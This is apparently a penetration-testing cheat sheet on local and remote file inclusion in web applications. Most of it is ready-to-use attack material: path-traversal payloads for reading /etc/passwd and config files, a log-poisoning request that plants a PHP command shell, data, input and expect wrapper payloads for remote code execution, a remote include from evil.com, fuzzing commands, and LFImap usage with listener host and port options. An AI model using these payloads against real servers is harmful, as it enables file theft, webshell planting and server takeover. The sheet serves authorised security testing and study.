File Inclusion

Notes about some basic File Insclusion attack

Playground

Dangerous Function

Function

Read Content

Execute

Remote URL

PHP

include()/include_once()

βœ…

βœ…

βœ…

require()/require_once()

βœ…

βœ…

❌

file_get_contents()

βœ…

❌

βœ…

fopen()/file()

βœ…

❌

❌

NodeJS

fs.readFile()

βœ…

❌

❌

fs.sendFile()

βœ…

❌

❌

res.render()

βœ…

βœ…

❌

Java

include

βœ…

❌

❌

import

βœ…

βœ…

βœ…

.NET

@Html.Partial()

βœ…

❌

❌

@Html.RemotePartial()

βœ…

❌

βœ…

Response.WriteFile()

βœ…

❌

❌

include

βœ…

βœ…

βœ…

Local File Inclusion (LFI)

Local File Inclusion (LFI) is a type of vulnerability where an attacker can exploit a web application to include files that are already present on the server. By manipulating input parameters, such as URLs or form fields, the attacker can trick the application into loading files from the local file system, potentially accessing sensitive information or executing malicious code.

Basic LFI Payloads

CommandDescription

/etc/passwd

Basic LFI

../../../../etc/passwd

LFI with path traversal

/../../../etc/passwd

LFI with name prefix

./languages/../../../../etc/passwd

LFI with approved path

php://filter/read=convert.base64-encode/resource=config

LFI with Base64 Filter

../../../../etc/passwd%00

LFI with Null byte

Log Poisoning to RCE

# Inject Access Log
curl -X "<?php echo passthru(\$_GET['cmd']);?>" http://target.com/

# Access
http://target.com/index.php?page=/var/log/apache2/access.log&cmd=id

Access Log Location

Apache:

/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/opt/lampp/logs/access_log
/opt/lampp/logs/error_log
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/www/logs/thttpd_log
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/thttpd_log
/var/www/log/access_log
/var/www/log/error_log
/var/www/logs/access.log
/var/www/logs/access_log
/var/www/logs/error.log
/var/www/logs/error_log
C:\apache\logs\access.log
C:\apache\logs\error.log
C:\Program Files\Apache Group\Apache\logs\access.log
C:\Program Files\Apache Group\Apache\logs\error.log
C:\program files\wamp\apache2\logs
C:\wamp\apache2\logs
C:\wamp\logs
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log

Nginx:

  • /var/log/nginx/access.log

LFI to RCE

# Data Wrappers
http://target.com/index.php?page=/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id

# Input Wrappers
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://target.com/index.php?page=php://input&cmd=id"

# Expect Wrappers
curl -s "http://target.com/index.php?page=expect://id"

Remote File Inclusion (RFI)

In most languages, including remote URLs is considered as a dangerous practice as it may allow for such vulnerabilities. This is why remote URL inclusion is usually disabled by default. For example, any remote URL inclusion in PHP would require the allow_url_include setting to be enabled.

http://target.com/index.php?page=ftp://user:pass@localhost/shell.php&cmd=id
http://target.com/index.php?page=http://evil.com/shell.php&cmd=id

Automation

# Fuzzing Parameter
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://target.com/index.php?FUZZ=value' -fs 2309

# Check working payload with LFI wordlists
ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://target.com/index.php?view=FUZZ' -fs 2309

# Read Apache2 Conf
curl http://target.com/index.php?view=../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf

Tools

LFImap

# Install
git clone https://github.com/hansmach1ne/LFImap
cd LFImap/
python3 -m venv lfimap_env
source lfimap_env/bin/activate
pip3 install -r requirements.txt

# Usage
Usage:
python3 lfimap.py --help
python3 lfimap.py -U "http://10.10.70.223/playground.php?page=test" -a
python3 lfimap.py -U "http://10.10.70.223/playground.php?page=test" -x --lhost 10.9.245.106 --lport 443

WordLists

  • https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Linux

  • https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Windows

  • https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt

References

Last updated